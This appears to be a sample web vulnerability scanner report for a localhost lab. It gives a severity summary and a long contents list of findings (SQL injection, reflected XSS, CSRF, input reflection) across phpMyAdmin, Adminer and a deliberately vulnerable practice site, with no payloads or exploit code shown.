Sample Report

Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.

    Confidence
    Certain Firm Tentative Total
Severity High 4 25 0 29
Medium 0 2 0 2
Low 4 6 3 13
Information 390 8 8 406

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

    Number of issues
    0 5 10 15 20 25 30
Severity High
 
Medium
 
Low
 

Contents

1. SQL injection

1.1. http://localhost/adminer [Referer HTTP header]

1.2. http://localhost/adminer [User-Agent HTTP header]

1.3. http://localhost/adminer [name of an arbitrarily supplied URL parameter]

1.4. http://localhost/adminer/ [Referer HTTP header]

1.5. http://localhost/adminer/ [User-Agent HTTP header]

1.6. http://localhost/adminer/ [name of an arbitrarily supplied URL parameter]

1.7. http://localhost/adminer/adminer-4.6.3.php [Referer HTTP header]

1.8. http://localhost/adminer/adminer-4.6.3.php [User-Agent HTTP header]

1.9. http://localhost/adminer/adminer-4.6.3.php [adminer_key cookie]

1.10. http://localhost/adminer/adminer-4.6.3.php [adminer_lang cookie]

1.11. http://localhost/adminer/adminer-4.6.3.php [adminer_permanent cookie]

1.12. http://localhost/adminer/adminer-4.6.3.php [adminer_sid cookie]

1.13. http://localhost/adminer/adminer-4.6.3.php [auth%5bdb%5d parameter]

1.14. http://localhost/adminer/adminer-4.6.3.php [auth%5bdriver%5d parameter]

1.15. http://localhost/adminer/adminer-4.6.3.php [auth%5bpassword%5d parameter]

1.16. http://localhost/adminer/adminer-4.6.3.php [auth%5bpermanent%5d parameter]

1.17. http://localhost/adminer/adminer-4.6.3.php [auth%5bserver%5d parameter]

1.18. http://localhost/adminer/adminer-4.6.3.php [auth%5busername%5d parameter]

1.19. http://localhost/adminer/adminer-4.6.3.php [db parameter]

1.20. http://localhost/adminer/adminer-4.6.3.php [lang parameter]

1.21. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied URL parameter]

1.22. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied body parameter]

1.23. http://localhost/adminer/adminer-4.6.3.php [server parameter]

1.24. http://localhost/adminer/adminer-4.6.3.php [token parameter]

1.25. http://localhost/adminer/adminer-4.6.3.php [username parameter]

2. Cross-site scripting (reflected)

2.1. http://localhost/ [lang parameter]

2.2. http://localhost/add_vhost.php [lang parameter]

3. Cleartext submission of password

3.1. http://localhost/

3.2. http://localhost/examplewebiste/vulnerabilities/csrf/

4. Session token in URL

4.1. http://localhost/phpmyadmin/index.php

4.2. http://localhost/phpmyadmin/index.php

5. Client-side JSON injection (DOM-based)

5.1. http://localhost/phpmyadmin/js/vendor/js.cookie.js

5.2. http://localhost/phpmyadmin/js/vendor/js.cookie.js

6. Password submitted using GET method

6.1. http://localhost/examplewebiste/vulnerabilities/brute/

6.2. http://localhost/examplewebiste/vulnerabilities/csrf/

7. Open redirection (DOM-based)

8. Open redirection (reflected DOM-based)

9. Password field with autocomplete enabled

10. Link manipulation (DOM-based)

10.1. http://localhost/phpmyadmin/doc/html/search.html

10.2. http://localhost/phpmyadmin/doc/html/search.html

11. Client-side HTTP parameter pollution (reflected)

11.1. http://localhost/ [lang parameter]

11.2. http://localhost/add_vhost.php [lang parameter]

12. Source code disclosure

13. Unencrypted communications

14. Path-relative style sheet import

14.1. http://localhost/

14.2. http://localhost/examplewebiste/

14.3. http://localhost/examplewebiste/about

14.4. http://localhost/examplewebiste/instructions

14.5. http://localhost/examplewebiste/vulnerabilities/brute/

14.6. http://localhost/phpsysinfo/index.php

15. Cross-site request forgery

15.1. http://localhost/add_vhost.php

15.2. http://localhost/phpmyadmin/index.php

16. Referer-dependent response

17. Spoofable client IP address

18. User agent-dependent response

19. Input returned in response (reflected)

19.1. http://localhost/ [Referer HTTP header]

19.2. http://localhost/ [User-Agent HTTP header]

19.3. http://localhost/ [lang parameter]

19.4. http://localhost/ [name of an arbitrarily supplied URL parameter]

19.5. http://localhost/ [phpinfo parameter]

19.6. http://localhost/add_vhost [URL path filename]

19.7. http://localhost/add_vhost.php [URL path filename]

19.8. http://localhost/add_vhost.php [lang parameter]

19.9. http://localhost/add_vhost.php [name of an arbitrarily supplied URL parameter]

19.10. http://localhost/adminer [URL path filename]

19.11. http://localhost/adminer/ [URL path folder 1]

19.12. http://localhost/adminer/adminer-4.6.3.php [URL path filename]

19.13. http://localhost/adminer/adminer-4.6.3.php [URL path folder 1]

19.14. http://localhost/adminer/adminer-4.6.3.php [adminer_key cookie]

19.15. http://localhost/adminer/adminer-4.6.3.php [adminer_permanent cookie]

19.16. http://localhost/adminer/adminer-4.6.3.php [auth%5bdb%5d parameter]

19.17. http://localhost/adminer/adminer-4.6.3.php [auth%5bdriver%5d parameter]

19.18. http://localhost/adminer/adminer-4.6.3.php [auth%5bserver%5d parameter]

19.19. http://localhost/adminer/adminer-4.6.3.php [auth%5busername%5d parameter]

19.20. http://localhost/adminer/adminer-4.6.3.php [db parameter]

19.21. http://localhost/adminer/adminer-4.6.3.php [lang parameter]

19.22. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied URL parameter]

19.23. http://localhost/adminer/adminer-4.6.3.php [server parameter]

19.24. http://localhost/adminer/adminer-4.6.3.php [token parameter]

19.25. http://localhost/adminer/adminer-4.6.3.php [username parameter]

19.26. http://localhost/examplewebiste/ [URL path folder 1]

19.27. http://localhost/examplewebiste/about [URL path filename]

19.28. http://localhost/examplewebiste/about [URL path folder 1]

19.29. http://localhost/examplewebiste/config [URL path filename]

19.30. http://localhost/examplewebiste/config [URL path folder 1]

19.31. http://localhost/examplewebiste/config/ [URL path folder 1]

19.32. http://localhost/examplewebiste/config/ [URL path folder 2]

19.33. http://localhost/examplewebiste/config/config.inc [URL path filename]

19.34. http://localhost/examplewebiste/config/config.inc [URL path folder 1]

19.35. http://localhost/examplewebiste/config/config.inc [URL path folder 2]

19.36. http://localhost/examplewebiste/config/config.inc.php.bak [URL path filename]

19.37. http://localhost/examplewebiste/config/config.inc.php.bak [URL path folder 1]

19.38. http://localhost/examplewebiste/config/config.inc.php.bak [URL path folder 2]

19.39. http://localhost/examplewebiste/docs/ [URL path folder 1]

19.40. http://localhost/examplewebiste/docs/ [URL path folder 2]

19.41. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path filename]

19.42. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path folder 1]

19.43. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path folder 2]

19.44. http://localhost/examplewebiste/docs/pdf [URL path filename]

19.45. http://localhost/examplewebiste/docs/pdf [URL path folder 1]

19.46. http://localhost/examplewebiste/docs/pdf [URL path folder 2]

19.47. http://localhost/examplewebiste/docs/pdf.html [URL path filename]

19.48. http://localhost/examplewebiste/docs/pdf.html [URL path folder 1]

19.49. http://localhost/examplewebiste/docs/pdf.html [URL path folder 2]

19.50. http://localhost/examplewebiste/examplewebiste [URL path filename]

19.51. http://localhost/examplewebiste/examplewebiste [URL path folder 1]

19.52. http://localhost/examplewebiste/examplewebiste/ [URL path folder 1]

19.53. http://localhost/examplewebiste/examplewebiste/ [URL path folder 2]

19.54. http://localhost/examplewebiste/examplewebiste/css [URL path filename]

19.55. http://localhost/examplewebiste/examplewebiste/css [URL path folder 1]

19.56. http://localhost/examplewebiste/examplewebiste/css [URL path folder 2]

19.57. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 1]

19.58. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 2]

19.59. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 3]

19.60. http://localhost/examplewebiste/examplewebiste/images [URL path filename]

19.61. http://localhost/examplewebiste/examplewebiste/images [URL path folder 1]

19.62. http://localhost/examplewebiste/examplewebiste/images [URL path folder 2]

19.63. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 1]

19.64. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 2]

19.65. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 3]

19.66. http://localhost/examplewebiste/examplewebiste/includes [URL path filename]

19.67. http://localhost/examplewebiste/examplewebiste/includes [URL path folder 1]

19.68. http://localhost/examplewebiste/examplewebiste/includes [URL path folder 2]

19.69. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 1]

19.70. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 2]

19.71. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 3]

19.72. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 1]

19.73. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 2]

19.74. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 3]

19.75. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 4]

19.76. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path filename]

19.77. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 1]

19.78. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 2]

19.79. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 3]

19.80. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 4]

19.81. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path filename]

19.82. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 1]

19.83. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 2]

19.84. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 3]

19.85. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 4]

19.86. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path filename]

19.87. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 1]

19.88. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 2]

19.89. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 3]

19.90. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path filename]

19.91. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 1]

19.92. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 2]

19.93. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 3]

19.94. http://localhost/examplewebiste/examplewebiste/js [URL path filename]

19.95. http://localhost/examplewebiste/examplewebiste/js [URL path folder 1]

19.96. http://localhost/examplewebiste/examplewebiste/js [URL path folder 2]

19.97. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 1]

19.98. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 2]

19.99. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 3]

19.100. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path filename]

19.101. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 1]

19.102. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 2]

19.103. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 3]

19.104. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path filename]

19.105. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 1]

19.106. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 2]

19.107. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 3]

19.108. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path filename]

19.109. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 1]

19.110. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 2]

19.111. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 3]

19.112. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path filename]

19.113. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 1]

19.114. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 2]

19.115. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 3]

19.116. http://localhost/examplewebiste/instructions [URL path filename]

19.117. http://localhost/examplewebiste/instructions [URL path folder 1]

19.118. http://localhost/examplewebiste/vulnerabilities/ [URL path folder 2]

19.119. http://localhost/examplewebiste/vulnerabilities/brute/ [URL path folder 2]

19.120. http://localhost/examplewebiste/vulnerabilities/brute/ [URL path folder 3]

19.121. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 2]

19.122. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 3]

19.123. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 4]

19.124. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 2]

19.125. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 3]

19.126. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 4]

19.127. http://localhost/examplewebiste/vulnerabilities/captcha/ [URL path folder 2]

19.128. http://localhost/examplewebiste/vulnerabilities/captcha/ [URL path folder 3]

19.129. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 2]

19.130. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 3]

19.131. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 4]

19.132. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 2]

19.133. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 3]

19.134. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 4]

19.135. http://localhost/examplewebiste/vulnerabilities/csp/ [URL path folder 2]

19.136. http://localhost/examplewebiste/vulnerabilities/csp/ [URL path folder 3]

19.137. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 2]

19.138. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 3]

19.139. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 4]

19.140. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 2]

19.141. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 3]

19.142. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 4]

19.143. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path filename]

19.144. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 1]

19.145. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 2]

19.146. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 3]

19.147. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 4]

19.148. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path filename]

19.149. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 1]

19.150. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 2]

19.151. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 3]

19.152. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 4]

19.153. http://localhost/examplewebiste/vulnerabilities/csrf/ [URL path folder 2]

19.154. http://localhost/examplewebiste/vulnerabilities/csrf/ [URL path folder 3]

19.155. http://localhost/examplewebiste/vulnerabilities/exec/ [URL path folder 2]

19.156. http://localhost/examplewebiste/vulnerabilities/exec/ [URL path folder 3]

19.157. http://localhost/examplewebiste/vulnerabilities/fi/ [URL path folder 2]

19.158. http://localhost/examplewebiste/vulnerabilities/fi/ [URL path folder 3]

19.159. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 2]

19.160. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 3]

19.161. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 4]

19.162. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 2]

19.163. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 3]

19.164. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 4]

19.165. http://localhost/examplewebiste/vulnerabilities/javascript/ [URL path folder 2]

19.166. http://localhost/examplewebiste/vulnerabilities/javascript/ [URL path folder 3]

19.167. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 2]

19.168. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 3]

19.169. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 4]

19.170. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 2]

19.171. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 3]

19.172. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 4]

19.173. http://localhost/examplewebiste/vulnerabilities/sqli/ [URL path folder 2]

19.174. http://localhost/examplewebiste/vulnerabilities/sqli/ [URL path folder 3]

19.175. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 2]

19.176. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 3]

19.177. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 4]

19.178. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 2]

19.179. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 3]

19.180. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 4]

19.181. http://localhost/examplewebiste/vulnerabilities/sqli_blind/ [URL path folder 2]

19.182. http://localhost/examplewebiste/vulnerabilities/sqli_blind/ [URL path folder 3]

19.183. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 2]

19.184. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 3]

19.185. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 4]

19.186. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 2]

19.187. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 3]

19.188. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 4]

19.189. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path filename]

19.190. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path folder 1]

19.191. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path folder 2]

19.192. http://localhost/examplewebiste/vulnerabilities/view_help.php [name of an arbitrarily supplied URL parameter]

19.193. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path filename]

19.194. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path folder 1]

19.195. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path folder 2]

19.196. http://localhost/examplewebiste/vulnerabilities/view_source.php [name of an arbitrarily supplied URL parameter]

19.197. http://localhost/icons/small/ [URL path folder 2]

19.198. http://localhost/phpmyadmin/doc/ [URL path folder 2]

19.199. http://localhost/phpmyadmin/doc/html/search.html [URL path filename]

19.200. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 1]

19.201. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 2]

19.202. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 3]

19.203. http://localhost/phpmyadmin/index.php [URL path filename]

19.204. http://localhost/phpmyadmin/index.php [URL path folder 1]

19.205. http://localhost/phpmyadmin/index.php [db parameter]

19.206. http://localhost/phpmyadmin/index.php [name of an arbitrarily supplied URL parameter]

19.207. http://localhost/phpmyadmin/index.php [table parameter]

19.208. http://localhost/phpmyadmin/js/ [URL path folder 2]

19.209. http://localhost/phpmyadmin/js/ajax.js [URL path filename]

19.210. http://localhost/phpmyadmin/js/ajax.js [URL path folder 1]

19.211. http://localhost/phpmyadmin/js/ajax.js [URL path folder 2]

19.212. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path filename]

19.213. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 1]

19.214. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 2]

19.215. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 3]

19.216. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 4]

19.217. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 5]

19.218. http://localhost/phpmyadmin/js/common.js [URL path filename]

19.219. http://localhost/phpmyadmin/js/common.js [URL path folder 1]

19.220. http://localhost/phpmyadmin/js/common.js [URL path folder 2]

19.221. http://localhost/phpmyadmin/js/config.js [URL path filename]

19.222. http://localhost/phpmyadmin/js/config.js [URL path folder 1]

19.223. http://localhost/phpmyadmin/js/config.js [URL path folder 2]

19.224. http://localhost/phpmyadmin/js/console.js [URL path filename]

19.225. http://localhost/phpmyadmin/js/console.js [URL path folder 1]

19.226. http://localhost/phpmyadmin/js/console.js [URL path folder 2]

19.227. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path filename]

19.228. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path folder 1]

19.229. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path folder 2]

19.230. http://localhost/phpmyadmin/js/doclinks.js [URL path filename]

19.231. http://localhost/phpmyadmin/js/doclinks.js [URL path folder 1]

19.232. http://localhost/phpmyadmin/js/doclinks.js [URL path folder 2]

19.233. http://localhost/phpmyadmin/js/error_report.js [URL path filename]

19.234. http://localhost/phpmyadmin/js/error_report.js [URL path folder 1]

19.235. http://localhost/phpmyadmin/js/error_report.js [URL path folder 2]

19.236. http://localhost/phpmyadmin/js/functions.js [URL path filename]

19.237. http://localhost/phpmyadmin/js/functions.js [URL path folder 1]

19.238. http://localhost/phpmyadmin/js/functions.js [URL path folder 2]

19.239. http://localhost/phpmyadmin/js/indexes.js [URL path filename]

19.240. http://localhost/phpmyadmin/js/indexes.js [URL path folder 1]

19.241. http://localhost/phpmyadmin/js/indexes.js [URL path folder 2]

19.242. http://localhost/phpmyadmin/js/keyhandler.js [URL path filename]

19.243. http://localhost/phpmyadmin/js/keyhandler.js [URL path folder 1]

19.244. http://localhost/phpmyadmin/js/keyhandler.js [URL path folder 2]

19.245. http://localhost/phpmyadmin/js/menu-resizer.js [URL path filename]

19.246. http://localhost/phpmyadmin/js/menu-resizer.js [URL path folder 1]

19.247. http://localhost/phpmyadmin/js/menu-resizer.js [URL path folder 2]

19.248. http://localhost/phpmyadmin/js/messages.php [URL path filename]

19.249. http://localhost/phpmyadmin/js/messages.php [URL path folder 1]

19.250. http://localhost/phpmyadmin/js/messages.php [URL path folder 2]

19.251. http://localhost/phpmyadmin/js/messages.php [name of an arbitrarily supplied URL parameter]

19.252. http://localhost/phpmyadmin/js/navigation.js [URL path filename]

19.253. http://localhost/phpmyadmin/js/navigation.js [URL path folder 1]

19.254. http://localhost/phpmyadmin/js/navigation.js [URL path folder 2]

19.255. http://localhost/phpmyadmin/js/page_settings.js [URL path filename]

19.256. http://localhost/phpmyadmin/js/page_settings.js [URL path folder 1]

19.257. http://localhost/phpmyadmin/js/page_settings.js [URL path folder 2]

19.258. http://localhost/phpmyadmin/js/rte.js [URL path filename]

19.259. http://localhost/phpmyadmin/js/rte.js [URL path folder 1]

19.260. http://localhost/phpmyadmin/js/rte.js [URL path folder 2]

19.261. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path filename]

19.262. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path folder 1]

19.263. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path folder 2]

19.264. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path filename]

19.265. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 1]

19.266. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 2]

19.267. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 3]

19.268. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 4]

19.269. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 5]

19.270. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 6]

19.271. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path filename]

19.272. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 1]

19.273. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 2]

19.274. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 3]

19.275. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 4]

19.276. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 5]

19.277. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 6]

19.278. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path filename]

19.279. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 1]

19.280. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 2]

19.281. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 3]

19.282. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 4]

19.283. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 5]

19.284. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 6]

19.285. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path filename]

19.286. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 1]

19.287. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 2]

19.288. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 3]

19.289. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 4]

19.290. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 5]

19.291. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 6]

19.292. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path filename]

19.293. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 1]

19.294. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 2]

19.295. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 3]

19.296. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 4]

19.297. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 5]

19.298. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path filename]

19.299. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 1]

19.300. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 2]

19.301. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 3]

19.302. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 4]

19.303. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 5]

19.304. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 6]

19.305. http://localhost/phpmyadmin/js/vendor/jquery/jquery-migrate.js [URL path filename]

19.306. http://localhost/phpmyadmin/js/vendor/jquery/jquery-migrate.js [URL path folder 1]

19.307. http://localhost/phpmyadmin/js/vendor/jquery/jquery-migrate.js [URL path folder 2]

19.308. http://localhost/phpmyadmin/js/vendor/jquery/jquery-migrate.js [URL path folder 3]

19.309. http://localhost/phpmyadmin/js/vendor/jquery/jquery-migrate.js [URL path folder 4]

19.310. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui-timepicker-addon.js [URL path filename]

19.311. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui-timepicker-addon.js [URL path folder 1]

19.312. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui-timepicker-addon.js [URL path folder 2]

19.313. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui-timepicker-addon.js [URL path folder 3]

19.314. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui-timepicker-addon.js [URL path folder 4]

19.315. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui.min.js [URL path filename]

19.316. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui.min.js [URL path folder 1]

19.317. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui.min.js [URL path folder 2]

19.318. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui.min.js [URL path folder 3]

19.319. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui.min.js [URL path folder 4]

19.320. http://localhost/phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js [URL path filename]

19.321. http://localhost/phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js [URL path folder 1]

19.322. http://localhost/phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js [URL path folder 2]

19.323. http://localhost/phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js [URL path folder 3]

